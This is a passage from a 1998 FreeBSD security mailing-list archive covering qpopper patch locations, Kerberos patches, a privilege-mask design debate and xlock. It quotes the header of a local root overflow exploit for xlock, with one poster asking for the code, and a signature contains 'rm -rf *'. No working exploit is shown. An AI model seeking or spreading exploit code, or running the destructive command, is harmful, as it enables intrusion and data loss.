Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: ; from Nicole on Tue, Jun 30, 1998 at 01:15:38PM -0700 X-Operating-System: FreeBSD the.oneinsane.net 2.2.6-STABLE X-Opinion: What you read here is my IMHO X-Disclaimer: I am a firm believer in RTFM X-WWW: http://www.oneinsane.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jun 30, 1998 at 01:15:38PM -0700, Nicole wrote: > > On 30-Jun-98 Jeremy Shaffner wrote: > > > > There is also a new version released today from Qualcomm. 2.5 is > > patched against all known problems. > > ftp://ftp.qualcomm.com/eudora/servers/popper/. > > > > > I just tried to go there and the eudora directory doesn't exist. i also tried > their other reccoemnded site. Anyone know of alternate sites? > > > Nicole You are not losing your mind.. I just checked and I dont see it anywhere. Ron -- -------------------------------------------------------- Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was null and void -------------------------------------------------------- It's so nice to be insane, nobody asks you to explain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 18:19:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA21013 for freebsd-security-outgoing; Tue, 30 Jun 1998 18:19:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from germanium.xtalwind.net (germanium.xtalwind.net [205.160.242.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA20642; Tue, 30 Jun 1998 18:17:39 -0700 (PDT) (envelope-from jack@germanium.xtalwind.net) Received: from localhost (jack@localhost) by germanium.xtalwind.net (8.9.0/8.9.0) with SMTP id VAA00733; Tue, 30 Jun 1998 21:17:27 -0400 (EDT) Date: Tue, 30 Jun 1998 21:17:27 -0400 (EDT) From: jack To: Nicole cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, brian@FreeBSD.ORG Subject: Re: Remote exploit in qpopper. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jun 1998, Nicole wrote: > On 30-Jun-98 Jeremy Shaffner wrote: > > > > There is also a new version released today from Qualcomm. 2.5 is > > patched against all known problems. > > ftp://ftp.qualcomm.com/eudora/servers/popper/. > > > > > I just tried to go there and the eudora directory doesn't exist. It most certainly does. drwxrwxr-x 16 17308 2501 2048 Jul 1 00:46 eudora However there is on component of the path missing in the above. /eudora/servers/unix/popper ^^^^ -------------------------------------------------------------------------- Jack O'Neill Systems Administrator / Systems Analyst jack@germanium.xtalwind.net Crystal Wind Communications, Inc. Finger jack@germanium.xtalwind.net for my PGP key. PGP Key fingerprint = F6 C4 E6 D4 2F 15 A7 67 FD 09 E9 3C 5F CC EB CD enriched, vcard, HTML messages > /dev/null Mail from netcom.com blocked until they stop relaying SPAM -------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 22:32:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27815 for freebsd-security-outgoing; Tue, 30 Jun 1998 22:32:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27804 for ; Tue, 30 Jun 1998 22:32:38 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id WAA17847 for security@FreeBSD.ORG; Tue, 30 Jun 1998 22:32:38 -0700 (PDT) Message-Id: <199807010532.WAA17847@burka.rdy.com> Subject: kerberos5 To: security@FreeBSD.ORG Date: Tue, 30 Jun 1998 22:32:38 -0700 (PDT) X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've updated my patches for krb5-1.0.5 for FreeBSD. New: ftp://ftp.rdy.com/pub/krb5/krb5-1.0.5+freebsd.diff Old: ftp://ftp.rdy.com/pub/krb5/krb5-1.0.5+freebsd.diff.OLD -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 22:53:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA00392 for freebsd-security-outgoing; Tue, 30 Jun 1998 22:53:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from platon.man.lublin.pl (hero@platon.man.lublin.pl [192.147.37.103]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA00359 for ; Tue, 30 Jun 1998 22:52:50 -0700 (PDT) (envelope-from hero@platon.man.lublin.pl) Received: from localhost (hero@localhost) by platon.man.lublin.pl (8.8.7/8.8.7) with SMTP id HAA07885 for ; Wed, 1 Jul 1998 07:52:28 +0200 Date: Wed, 1 Jul 1998 07:52:28 +0200 (CEST) From: Henryk Czapski To: freebsd-security@FreeBSD.ORG Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe freebsd-security Henryk Czapski To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 00:10:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA08249 for freebsd-security-outgoing; Wed, 1 Jul 1998 00:10:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA08241 for ; Wed, 1 Jul 1998 00:10:43 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id DAA11586; Wed, 1 Jul 1998 03:08:52 -0400 (EDT) From: "Allen Smith" Message-Id: <9807010308.ZM11585@beatrice.rutgers.edu> Date: Wed, 1 Jul 1998 03:08:52 -0400 In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jun 24, 8:49pm) References: <199806250349.UAA08929@implode.root.com> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: dg@root.com, security@FreeBSD.ORG Cc: njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com, easmith@beatrice.rutgers.edu Subject: Re: bsd securelevel patch question Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 24, 8:49pm, David Greenman (possibly) wrote: > I can imagine that the list could be on the order of 32 large. What about permissions for below-1024 ports? I really don't want to give an anonymous-only version of ftp the ability to bind to _any_ TCP port, for instance - that largely defeats the purpose of having a non-root program able to bind to such ports (namely limiting extra access). > This is one of the reasons why I don't think that a gid based scheme scales > very well. > You'd have to do a search through the fairly large group set each time you > wanted to check for the capability. Even if we did implement the gid method > externally, I still think that the kernel internal representation would be > best handled by a privilege mask. I can see this reasoning for most privileges... but not for the port ones. Hmm... how about a specific permission for PRIV_TCP, granted to any process with a group between x+1 and x+1023, with the port access granted being port=(group-x)? The same would be for PRIV_UDP. This would admittedly necessitate a group set scan for the group corresponding to the requested port. ucred seems to be a logical place to put a privilege mask. Incidentally, I goofed on my correcting message, with regard to NFS; nosuid is of course for the _client_, and the important one in this case would be an extension of the root translation. -Allen P.S. You were mentioning VAXen before; as it happens, I've been a user on those. Their privilege scheme is something I've had in mind also. -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 00:23:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA09307 for freebsd-security-outgoing; Wed, 1 Jul 1998 00:23:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Eleet.iele.polsl.gliwice.pl (michalk@eleet.iele.polsl.gliwice.pl [157.158.17.60]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA09300 for ; Wed, 1 Jul 1998 00:23:08 -0700 (PDT) (envelope-from michalk@Eleet.iele.polsl.gliwice.pl) Received: from localhost (michalk@localhost) by Eleet.iele.polsl.gliwice.pl (8.8.5/8.8.5) with SMTP id JAA10761 for ; Wed, 1 Jul 1998 09:22:59 +0200 Date: Wed, 1 Jul 1998 09:22:58 +0200 (MET DST) From: Michal Kopijasz To: freebsd-security@FreeBSD.ORG Subject: Re: xlock In-Reply-To: <19980629092005.33214@gil.physik.rwth-aachen.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Jun 1998, Christoph Kukulies wrote: > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote: > > Christoph Kukulies writes: > > > > > Alarmed by recent buffer overflow attacks on Linux machines in > > > my vicinity (an exploit for this is available) I thought about > > > xlock under FreeBSD and would like to know whether the > > > security hole has been sorted out under FreeBSD 2.2.x or what > > > measures are advised to prevent it. > > > > Could you tell more about this? > > /* x86 XLOCK overflow exploit > by cesaro@0wned.org 4/17/97 > > Original exploit framework - lpr exploit > > Usage: make xlock-exploit > xlock-exploit > > Assumptions: xlock is suid root, and installed in /usr/X11/bin > */ > > [complete xploit can be sent on demand] do You can send me? thanks Michal; ircNET: mkm ;icq:UIN 14202913; http://elf.univ.waw.pl/~znachor traceroute to siemianowice.sl.pl mailto: mordownia@50.ml.org "Albo znajdziemy droge, albo ja zbudujemy" Hannibal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 00:45:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAB11774 for freebsd-security-outgoing; Wed, 1 Jul 1998 00:45:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA11747 for ; Wed, 1 Jul 1998 00:45:24 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id AAA01700; Wed, 1 Jul 1998 00:44:24 -0700 (PDT) Message-Id: <199807010744.AAA01700@implode.root.com> To: "Allen Smith" cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Wed, 01 Jul 1998 03:08:52 EDT." <9807010308.ZM11585@beatrice.rutgers.edu> From: David Greenman Reply-To: dg@root.com Date: Wed, 01 Jul 1998 00:44:24 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> You'd have to do a search through the fairly large group set each time you >> wanted to check for the capability. Even if we did implement the gid method >> externally, I still think that the kernel internal representation would be >> best handled by a privilege mask. > >I can see this reasoning for most privileges... but not for the port >ones. Hmm... how about a specific permission for PRIV_TCP, granted to >any process with a group between x+1 and x+1023, with the port access >granted being port=(group-x)? The same would be for PRIV_UDP. This >would admittedly necessitate a group set scan for the group >corresponding to the requested port. ucred seems to be a logical place >to put a privilege mask. I'll resist any scheme that ties specific privileges to specific gids. To me it seems too kludgy and I also suspect that most FreeBSD admins will be quite unhappy about us hijacking a large block of gids for our special purposes. >P.S. You were mentioning VAXen before; as it happens, I've been a user >on those. Their privilege scheme is something I've had in mind >also. Prior to BSD, I operated a two machine VAX/VMS cluster for about 5 years in my home datacenter (a facility that is next to my home office). :-) -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 05:54:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA12732 for freebsd-security-outgoing; Wed, 1 Jul 1998 05:54:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA12664 for ; Wed, 1 Jul 1998 05:54:08 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199807011254.FAA12664@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA092757590; Wed, 1 Jul 1998 22:53:10 +1000 From: Darren Reed Subject: Re: bsd securelevel patch question To: easmith@beatrice.rutgers.edu (Allen Smith) Date: Wed, 1 Jul 1998 22:53:10 +1000 (EST) Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com, easmith@beatrice.rutgers.edu In-Reply-To: <9807010308.ZM11585@beatrice.rutgers.edu> from "Allen Smith" at Jul 1, 98 03:08:52 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sigh...the < 1024 port thing keeps coming up. I will try and dig up the hacks I did to portalfs to provide acl's for listen sockets. no stupid extended permissions checks in kernels necessary. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 06:35:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA16620 for freebsd-security-outgoing; Wed, 1 Jul 1998 06:35:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA16598 for ; Wed, 1 Jul 1998 06:35:04 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199807011335.GAA16598@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA096010059; Wed, 1 Jul 1998 23:34:19 +1000 From: Darren Reed Subject: Re: bsd securelevel patch question To: avalon@coombs.anu.edu.au (Darren Reed) Date: Wed, 1 Jul 1998 23:34:18 +1000 (EST) Cc: easmith@beatrice.rutgers.edu, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com In-Reply-To: <199807011254.FAA12664@hub.freebsd.org> from "Darren Reed" at Jul 1, 98 10:53:10 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Darren Reed, sie said: > > > sigh...the < 1024 port thing keeps coming up. I will try and dig up the > hacks I did to portalfs to provide acl's for listen sockets. > > no stupid extended permissions checks in kernels necessary. well, I dug it up, and it's not really pretty, but it does prove it is possible. the way I set it up to work was to read in the directory structure prior to mount_portal taking it over and then use the file perms in that for access control. this was just an experiment. a better way to do it is to have a separate configuration file for the perms. so that you can edit those whilst mount_portal is still running. I thought I'd had a go at that, but I don't see the code anywhere just now so I'll assume it's not going to be easily found. Darren http://coombs.anu.edu.au/~avalon/mount_portal.tgz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 15:35:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA05348 for freebsd-security-outgoing; Wed, 1 Jul 1998 15:35:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA05331 for ; Wed, 1 Jul 1998 15:35:19 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id RAA03933 for security@freebsd.org; Wed, 1 Jul 1998 17:35:20 -0500 (CDT) From: Igor Roshchin Message-Id: <199807012235.RAA03933@alecto.physics.uiuc.edu> Subject: Just FYI: QPOPPER-2.52 To: security@FreeBSD.ORG Date: Wed, 1 Jul 1998 17:35:20 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've noticed that one more patch was changed on Jun 30, and the Makefile for the newer version (2.5) was made available today. Thanks for the quick job. Just FYI: it's already 2.52 which is the current version. I don't what they've changed there from 2.51 to 2.52, but it was announced that 2.51 : "It fixes the bulletins bug and changes the licensing." Sorry, probably it doesn't belong to this mailing list anymore... IgoR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 20:14:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA18592 for freebsd-security-outgoing; Wed, 1 Jul 1998 20:14:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns2.sminter.com.ar (ns2.sminter.com.ar [200.10.100.11]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA18587 for ; Wed, 1 Jul 1998 20:14:15 -0700 (PDT) (envelope-from Recabarren!fpscha@ns2.sminter.com.ar) Received: (from uucp@localhost) by ns2.sminter.com.ar (8.8.5/8.8.4) id AAA24794 for FreeBSD.ORG!freebsd-security; Thu, 2 Jul 1998 00:12:20 -0300 (GMT) >Received: (from fpscha@localhost) by localhost.schapachnik.com.ar (8.8.5/8.8.5) id VAA00574; Wed, 1 Jul 1998 21:51:28 -0300 (ARST) From: "Fernando P. Schapachnik" Message-Id: <199807020051.VAA00574@localhost.schapachnik.com.ar> Subject: Re: Remote exploit in qpopper. To: insane@oneinsane.net (Ron 'The Insane One' Rosson) Date: Wed, 1 Jul 1998 21:51:28 -0300 (ARST) Cc: nicole@mediacity.com, freebsd-security@FreeBSD.ORG In-Reply-To: <19980630174336.A25206@oneinsane.net> from Ron 'The Insane One' Rosson at "Jun 30, 98 05:43:36 pm" Reply-To: fpscha@schapachnik.com.ar X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please note that since yesterday in is also available version 2.51, which fixes problems with bulletins. It is in the same directory of 2.5, whichever it is (I downloaded both version from the original location posted to the list, only I can't remember it). Regards! En un mensaje anterior Ron 'The Insane One' Rosson escribi˘: > > On Tue, Jun 30, 1998 at 01:15:38PM -0700, Nicole wrote: > > > > On 30-Jun-98 Jeremy Shaffner wrote: > > > > > > There is also a new version released today from Qualcomm. 2.5 is > > > patched against all known problems. > > > ftp://ftp.qualcomm.com/eudora/servers/popper/. > > > > > > > > > I just tried to go there and the eudora directory doesn't exist. i also tried > > their other reccoemnded site. Anyone know of alternate sites? > > > > > > Nicole > You are not losing your mind.. I just checked and I dont see it anywhere. > Ron > -- > -------------------------------------------------------- > Ron Rosson ... and a UNIX user said ... > The InSaNe One rm -rf * > insane@oneinsane.net and all was null and void > -------------------------------------------------------- > It's so nice to be insane, nobody asks you to explain. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > Fernando P. Schapachnik fpscha@schapachnik.com.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 20:58:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA24547 for freebsd-security-outgoing; Wed, 1 Jul 1998 20:58:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA24540 for ; Wed, 1 Jul 1998 20:58:45 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id WAA10387 for security@freebsd.org; Wed, 1 Jul 1998 22:58:46 -0500 (CDT) Date: Wed, 1 Jul 1998 22:58:46 -0500 (CDT) From: Igor Roshchin Message-Id: <199807020358.WAA10387@alecto.physics.uiuc.edu> To: security@FreeBSD.ORG Subject: (FWD) Qpopper 2.52 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org X-Sender: lgl@randy-nt4.qualcomm.com Message-ID: Date: Wed, 1 Jul 1998 16:04:17 -0700 Reply-To: Laurence Lundblade Sender: Bugtraq List From: Laurence Lundblade Subject: Qpopper 2.52 (was Re: qpopper 2.51) X-cc: Aleph One To: BUGTRAQ@NETSPACE.ORG In-Reply-To: Indeed things were moving around, though it wasn't quite a good thing. We had some trouble with our FTP server configuration. It has been resolved. We also have a few new fixes to qpopper. The current version is qpopper2.52. It fixes a few problems with bulletins, and some compilation issues with strerror() on some UNIXs that occured in 2.5. The official location is: ftp://ftp.qualcomm.com/eudora/servers/unix/popper Hopefully that puts an end to this issue. Sorry about the problems with the ftp server. Also I'll mention that we're planning a qpopper 3.0 that will fix a few more bugs that we know about (not security holes, I assure you). We have proposed a general POP extension mechanism that has passed last call with the IETF and is awaiting approval by the area director and the IESG and publication as an RFC. Qpopper 3.0 will support it. LL At 11:04 AM -0500 7/1/98, Aleph One wrote: >Well, it seems Qualcomm was moving stuff around last night. There is a >new version of qpopper out. It fixes the bulletins bug and changes the >licensing. > >ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.51.tar.Z > >Aleph One / aleph1@dfw.net >http://underground.org/ >KeyID 1024/948FD6B5 >Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 21:30:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA28967 for freebsd-security-outgoing; Wed, 1 Jul 1998 21:30:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA28865 for ; Wed, 1 Jul 1998 21:30:09 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from goober (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id VAA12933; Wed, 1 Jul 1998 21:26:06 -0700 (PDT) Message-Id: <3.0.5.32.19980701212646.03b99100@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Wed, 01 Jul 1998 21:26:46 -0700 To: fpscha@schapachnik.com.ar From: Jamie Lawrence Subject: Re: Remote exploit in qpopper. Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199807020051.VAA00574@localhost.schapachnik.com.ar> References: <19980630174336.A25206@oneinsane.net> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id VAA28910 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please note that since today there is a version 2.52 available, which fix problem found by various Bugtraq subscribers. My users are using an alternate mail delivery method until at least one day goes by without a new version which addresses security concerns being released. Ahem. -j At 09:51 PM 7/1/98 -0300, you wrote: >Please note that since yesterday in is also available version 2.51, which >fixes problems with bulletins. It is in the same directory of 2.5, >whichever it is (I downloaded both version from the original location >posted to the list, only I can't remember it). > >Regards! > >En un mensaje anterior Ron 'The Insane One' Rosson escribi˘: >> >> On Tue, Jun 30, 1998 at 01:15:38PM -0700, Nicole wrote: >> > >> > On 30-Jun-98 Jeremy Shaffner wrote: >> > > >> > > There is also a new version released today from Qualcomm. 2.5 is >> > > patched against all known problems. >> > > ftp://ftp.qualcomm.com/eudora/servers/popper/. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 22:11:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA02734 for freebsd-security-outgoing; Wed, 1 Jul 1998 22:11:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA02721 for ; Wed, 1 Jul 1998 22:11:17 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id BAA04258; Thu, 2 Jul 1998 01:14:01 -0400 (EDT) Date: Thu, 2 Jul 1998 01:14:01 -0400 (EDT) From: Mike To: Igor Roshchin cc: security@FreeBSD.ORG Subject: Re: (FWD) Qpopper 2.52 In-Reply-To: <199807020358.WAA10387@alecto.physics.uiuc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Jul 1998, Igor Roshchin wrote: [snip] > The current version is qpopper2.52. It fixes a few problems with bulletins, > and some compilation issues with strerror() on some UNIXs that occured in > 2.5. [snip] I'm running 2.5 right now... and will be awaiting 3.0. However, 2.52 seems to sig 11 like crazy here under 3.0-CURRENT. Maybe it's just me, I'll have to look at it again tomorrow when I'm a bit more 'awake'. :) -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 22:25:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA04292 for freebsd-security-outgoing; Wed, 1 Jul 1998 22:25:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA04279 for ; Wed, 1 Jul 1998 22:25:29 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from goober (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id WAA13366 for ; Wed, 1 Jul 1998 22:21:34 -0700 (PDT) Message-Id: <3.0.5.32.19980701222300.00bc91f0@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Wed, 01 Jul 1998 22:23:00 -0700 To: freebsd-security@FreeBSD.ORG From: Jamie Lawrence Subject: Off-Topic: Grammar Clarification (Was: Re: Remote exploit in qpopper.) In-Reply-To: <3.0.5.32.19980701212646.03b99100@204.74.82.151> References: <199807020051.VAA00574@localhost.schapachnik.com.ar> <19980630174336.A25206@oneinsane.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please note that the verb agreement grammatical error evidenced below was an unfortunate typo; it was neither my intention to make that error, nor to mock the language skills of anyone. Any mockery coming from this keyboard is, in general, well meaning, I hope. WRT the message below, the sarcasm is directed at a software vendor. I was not intentionally picking on anyone else, in any way. Apologies to any and all who may have viewed my message as, um, linguist. -j, going home before any more flames appear in my inbox. At 09:26 PM 7/1/98 -0700, Jamie Lawrence wrote: > >Please note that since today there is a version 2.52 available, which >fix problem found by various Bugtraq subscribers. > >My users are using an alternate mail delivery method until at least >one day goes by without a new version which addresses security concerns >being released. Ahem. > >-j > > >At 09:51 PM 7/1/98 -0300, you wrote: >>Please note that since yesterday in is also available version 2.51, which >>fixes problems with bulletins. It is in the same directory of 2.5, >>whichever it is (I downloaded both version from the original location >>posted to the list, only I can't remember it). >> >>Regards! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jul 1 22:29:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA04831 for freebsd-security-outgoing; Wed, 1 Jul 1998 22:29:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA04811 for ; Wed, 1 Jul 1998 22:29:28 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id BAA19414; Thu, 2 Jul 1998 01:26:22 -0400 (EDT) From: "Allen Smith" Message-Id: <9807020126.ZM19413@beatrice.rutgers.edu> Date: Thu, 2 